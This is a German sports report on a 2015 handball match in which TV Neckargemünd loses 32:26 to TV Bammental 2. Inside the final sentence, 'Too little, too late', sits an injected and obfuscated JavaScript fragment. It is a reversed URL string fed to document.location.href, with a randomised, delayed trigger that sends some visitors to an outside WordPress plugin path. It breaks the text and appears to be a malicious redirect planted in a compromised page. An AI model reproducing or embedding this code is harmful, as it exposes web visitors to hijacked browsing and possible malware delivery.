In der bammentaler Halle trafen die ersten Herren des TV Neckargemünd am Samstag, dem 25.04.2015, um 18:00 auf den TV Bammental. Das Hinspiel wurde mit Ach und Krach gewonnen und da die Jungs vom TVN genausogut Handball spielen, wie Feiern können, wollten sie die Saison mit einem Knaller beenden. (Endstand: TV Bammental 2 – TV Neckargemünd 32:26)
Neckargemünd, 28.05.15 (ast) –Die Voraussetzungen waren gut, keine Verletzten, kaum Ausfälle, eine beihnahe volle Bank. Die erste Halbzeit startete dann auch recht solide. Mit guten Torerfolgen und einer mittelmäßigen Abwehrleistung, ließ man den Gegner nur einmal, beim 5:4, in Führung gehen, eroberte die Führung dann wieder zurück und hielt sie auch bis zum Halbzeitstand von 13:16. Ansich war da schon wesentlich mehr drin, doch das eigene Licht wurde unter den Scheffel gestellt und beim Freiwurf der Gegner, 10 Sekunden vor Ende der ersten Halbzeit, ließ man sich unnötig düpieren und damit das 13. Tor der Gegner zu.
Die Ermahnung in der Kabine war deutlich: Mehr Präsenz in der Abwehr zeigen, lautstarke Absprache, Arme oben und im Angriff gut vorbereitete Abschlüsse.
Doch für die Jungs vom TVN war heute Gegenteil-Tag. Alles war still. Die Gegner durften vor der Abwehr tun und lassen was sie wollten. Die Arme blieben auf Gürtellinie. Die Abschlüsse wurden im 5-Sekunden-Takt gesucht.
Ach wie verwunderlich, dass Bammental aus den Minuten zwischen 30. und 40. 10 Torerfolge erzielen konnte und Neckargemünd nur 2. So wurde aus dem 13:16 ein 18:18 und dann ein 25:18. Erst dann begann man sich Abschnittsweise wieder zu berappeln und zeigte durchaus die Qualität, die sogar einen hohen Sieg der Gäste hätte rechtfertigen können.
Too little, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}too late, wie der Brite sagt.
Endstand 32:26.